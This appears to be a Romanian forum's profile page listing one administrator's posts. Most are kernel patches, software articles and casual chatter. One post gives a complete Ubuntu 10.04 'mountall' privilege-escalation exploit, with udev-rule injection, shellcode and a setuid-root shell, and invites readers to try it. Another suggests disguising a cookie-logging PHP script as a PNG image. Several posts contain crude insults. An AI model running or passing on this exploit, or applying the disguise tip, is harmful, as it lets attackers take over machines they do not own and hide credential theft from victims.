Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [PATCH] /arch/x86/kernel/apic/es7000_32.c (2.6.35.5): Unused variable --- a/arch/x86/kernel/apic/es7000_32.c 2010-09-20 23:59:09.000000000 +0300 +++ b/arch/x86/kernel/apic/es7000_32.c 2010-09-26 13:08:06.261116776 +0300 @@ -129,8 +129,6 @@ int es7000_plat; * GSI override for ES7000 platforms. */ -static unsigned int base; - static int __cpuinit wakeup_secondary_cpu_via_mip(int cpu, unsigned long eip) { unsigned long vect = 0, psaival = 0; Warning: arch/x86/kernel/apic/es7000_32.c:132: warning: ‘base’ defined but not used
  2. Florin Salam - Am fost mare vagabond
  3. Nu stiu ce proprietati si metode are WebBrowser-ul, dar cea mai buna solutie ar fi sa citesti sursa paginii (InternetOpen, Internet... APIs) si sa o parsezi. Adica, ai sursa paginii, cauti "<a" si ">" si intre ele gasesti "src=" sau src=" si ". La for se blocheaza? Probabil nu are acea proprietate/obiect Links, sau metoda Count PS: Am Linux, nu pot testa, deci nu te pot ajuta prea mult.
  4. Ce eroare apare?
  5. Hmm: GET /u57536064/audio/0461a6471ce5.mp3 HTTP/1.1 Accept: */* Host: cs4836.vkontakte.ru User-Agent: GJ LdzcJv22SAdkQiBH5hD it4qD47 I YdAfpixJ AGdb1RdLcK Connection: close Oricum, mi mi-a mers, l-am descarcat pe Florin Salan.
  6. Haaa, merge pe Wine si imi gaseste manele :->
  7. La puscarie, la puscarie, la puscariiiiiiiiiiiiiiiiiieeeeeeeeeeeeeeee! _|_
  8. archaeus5: Momentan nu stiu sa fac decat clatite . Dar o sa incerc eu tot felul de porcarii. Park: Imi place si mie psihologia, am citit o carte si din alta doar ce m-a interesat. Insa parca "te duc in lumea lor", abunda in termeni psihologici, in diverse denumiri stiitifice pentru orice lucru banal, te baga putin in ceata.
  9. Mi-am luat si eu o carte: "1000 de retete pentru incepatori si bucatari amatori"
  10. Ba, nu-mi plac deloc cacaturile astea...
  11. La mine: "This page has had 4,338 visits " De obicei cred ca se uita dupa ce primesc un warn, spera sa gaseasca ceva interesant probabil.
  12. Ma pis pe el, sa moara in puscarie, si el, si toti cei ca el care fura. Si da, multumim media pentru ca a sinonimizat cuvantul "hacker" cu HOT.
  13. Probabil foloseste utilitarele de la Nirsoft pentru a obtine datele dorite, nu vad ce ar fi in neregula cu asta
  14. Wikipedia: "PaX is a patch for the Linux kernel that implements least privilege protections for memory pages. The least-privilege approach allows computer programs to do only what they have to do in order to be able to execute properly, and nothing more. PaX was first released in 2000."
  15. Sunteti slabi, cu Nokia 3310 puteti face sniffing la convorbiri, le puteti inregistra.
  16. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability #!/bin/sh # by fuzz. For Anux inc. # # ubuntu 10.04 , 10.10 if [ -z "$1" ] then echo "usage: $0 <UDEV KERNEL EVENT>" echo "see here http://www.reactivated.net/writing_udev_rules.html" exit fi cat > usn985-exploit.sh << EOF #!/bin/sh chown root:root $PWD/usn985-sc chmod +s $PWD/usn985-sc EOF cat > usn985-sc.c << EOF char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; main(){int *r;*((int *)&r+2)=(int)s;} EOF gcc usn985-sc.c -o usn985-sc echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules chmod +x usn985-exploit.sh echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" Vulnerable: Ubuntu Ubuntu Linux 10.04 LTS Not Vulnerable: Ubuntu mountall 2.15.2 Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability [I]Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package. Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Ubuntu 10.04 LTS is vulnerable; other versions may also be affected. [/I] Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.deb Incercati si voi, cei cu Ubuntu.
  17. Mi se pare o mare tampenie. 1) $ipLog="cookies.html"; - Datele sunt salvate intr-un fisier HTML, asta inseamna un posibil XSS (na, nu prea util, dar cine stie) 2) $cookie = $HTTP_GET_VARS["c"]; - Asta nu e cookie Da, salveaza cateva date, dar cam atat, cookie pauza. Si se poate mai elegant, sa se foloseasca php_gd si sa se genereze o imagine png, astfel nu va avea cum sa stie nimeni (nu neaparat) ca e vorba de un script PHP.
  18. Nu aici. Trashed.
  19. [PATCH] /drivers/acpi/acpica/nsrepair.c (2.6.34.7) - Fixed useless compile warning Avertisment: drivers/acpi/acpica/nsrepair.c: In function ‘acpi_ns_repair_object’: drivers/acpi/acpica/nsrepair.c:125:29: warning: ‘new_object’ may be used uninitialized in this function Patch: --- a/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:35:56.568006487 +0300 +++ b/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:00:40.000000000 +0300 @@ -122,7 +122,7 @@ acpi_ns_repair_object(struct acpi_predef union acpi_operand_object **return_object_ptr) { union acpi_operand_object *return_object = *return_object_ptr; - union acpi_operand_object *new_object; + union acpi_operand_object *new_object = NULL; acpi_status status; ACPI_FUNCTION_NAME(ns_repair_object);
  20. ISO/ISC DTR 19769 (August 21, 2010) Working Draft, Standard for Programming Language C++ Download: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3126.pdf Interesant, si are doar 1331 (puteau sa mai puna si ei inca 6 cu poze) de pagini.
  21. Prefer Asus, Intel, ATI. De ce? Habar nu am. Dar mi se par firme serioase, mai serioase decat competitorii. La mine e ca si Nokia vs altceva. Mi se par produsele mai de calitate. Nu stiu cum sa spun, dar intre un procesor Intel si unul AMD cu exact aceleasi "calitati" (features) as alege Intel.
  22. Open Source File Archivers for Linux Posted by jun auza On 9/16/2010 A computer program that merges a number of files together into one archive file, or a series of archive files, for simpler transportation, storage, or backup is called a file archiver. Archiving or packing refers to the process of making an archive file, while unarchiving, unpacking or extracting means reconstructing the original files from the archive. The simplest file archivers just gather a list of files and concatenate their contents sequentially into the archive. For transferring a large number of individual files over a high latency network like the Internet, numerous file archivers employ archive formats that provide lossless data compression to reduce the size of the archive. If you are looking for a capable free and open-source file archiver for Linux, you should check out this list, and then pick out the one that would suit your needs: Xarchiver Xarchiver is a popular GTK+2 based file archiver that is designed to be independent of the desktop environment. It is utilized in a good number of lightweight Linux distributions like Xfce and LXDE. Xarchiver supports 7-zip, arj, bzip2, gzip, rar, lha, lzma, lzop, deb, rpm, tar and zip archives, archive navigation with mimetype icons, archive comment ability and archive listing as HTML or txt. Cut/Copy/Paste/Rename actions within files of variety of archives are also supported. Password detection and protection is automatic for arj, zip and rar files. File Roller File Roller is a simple and easy-to-use archive manager for the GNOME desktop environment. It has a graphical user interface and can create and modify archives, view the content of an archive and files contained in the archive, and of course extract files from the archive. It supports plenty of archive files such as 7-Zip (.7z), Tar, WinAce (.ace), gzip, RAR, and a whole lot more. Ark Ark is an archiving tool for the KDE desktop environment that is included into kdeutils package. It can view, extract, create, and modify archives through its intuitive GUI. Ark can handle different file formats that include tar, gzip, bzip2, zip, rar and lha. If the appropriate plugin from kdeaddons package is installed, it can be integrated into Konqueror in the KDE environment to handle archives through KParts technology. PeaZip PeaZip is both a file manager and file archiver that supports its native PEA archive format, featuring compression, multi volume split and flexible authenticated encryption, and integrity check schemes. It also has support for other mainstream formats, with special focus on handling open formats. With PeaZip, users can run extracting and archiving operations automatically using command-line generated exporting the job defined in the GUI front-end. For speeding up archiving or backup operation's definition, it can also create, edit and restore an archive's layout. FreeArc FreeArc is a fast and efficient file archiver that is said to work 2–5 times quicker than best programs in each compression class (ccm, 7-zip, rar, uharc -mz, pkzip) while retaining the same compression ratio. From technical grounds, it is superior to any existing practical compressor. Features include: * AES/Blowfish/Twofish/Serpent encryption * FAR and Total Commander plugins * Solid compression with smart updates * Ability to create self-extracting archives and installers * Archive protection and recovery
  23. Liviu Guta, Florin Peste si Play AJ - Sambata, duminica :->
  24. Ideea e simpla. Nu ma intereseaza daca e infectat sau nu. Daca sunteti baieti isteti il rulati pe masina virtuala. Daca sunteti si mai destepti nu il descarcati, deci nu il rulati.
  25. Mm de copil prost. http://www.virustotal.com/file-scan/report.html?id=28d0e945f0648bed7b7b2a2139f2b9bf1901feec39ff4f6c0315fa58e054f44e-1283279679 E detectat ca HACKTOOL, adica nu ca TROJAN sau ce iti mai baga mata in cur. Ban. Sa inteleaga toti ratatii ca asta de mai sus. Sunt si programe care nu fura parolele de Firefox (PSW.Stealer) sau nu permit controlul de la distanta al calculatorului vostru (Backdoor, RAT, Trojan) sau altele, dar care SUNT DETECTATE. Asta nu inseamna neaparat ca se caca in calculatoru vostru. Nu stau sa verific toate programele pe care le postez daca sunt infectate, nu o sa stea nimeni sa faca asta. Scanati pe virustotal, va uitati si voi ca ce anume e detectat un program. Sau mai bine verificati voi daca programul e infectat si gata, nu mai veniti aici ca "e virusat" sau alte prostii.
×
×
  • Create New...